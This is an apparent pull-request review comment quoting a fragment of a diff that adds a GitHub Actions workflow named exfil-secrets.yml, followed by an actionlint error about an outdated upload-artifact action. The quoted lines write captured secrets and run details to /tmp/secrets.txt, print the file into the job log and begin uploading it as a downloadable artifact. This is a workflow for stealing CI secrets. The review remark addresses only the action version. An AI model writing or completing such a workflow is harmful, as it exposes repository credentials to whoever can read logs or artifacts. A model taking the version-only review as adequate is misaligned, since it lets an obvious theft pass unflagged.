.github/workflows/exfil-secrets.yml

```
@@ -0,0 +1,41 @@
+          GitHub Actor: ${{ github.actor }}
+          Event Name: ${{ github.event_name }}
+          ============================================
+          SECRETSEOF
+          
+          echo "[+] Secrets captured to file"
+          echo "---START---"
+          cat /tmp/secrets.txt
+          echo "---END---"
+      
+      - name: Upload Secrets as Artifact
+        uses: actions/upload-artifact@v3
```

actionlint (1.7.12)

[error] the runner of "actions/upload-artifact@v3" action is too old to run on GitHub Actions. update the action's version to fix this issue

(action)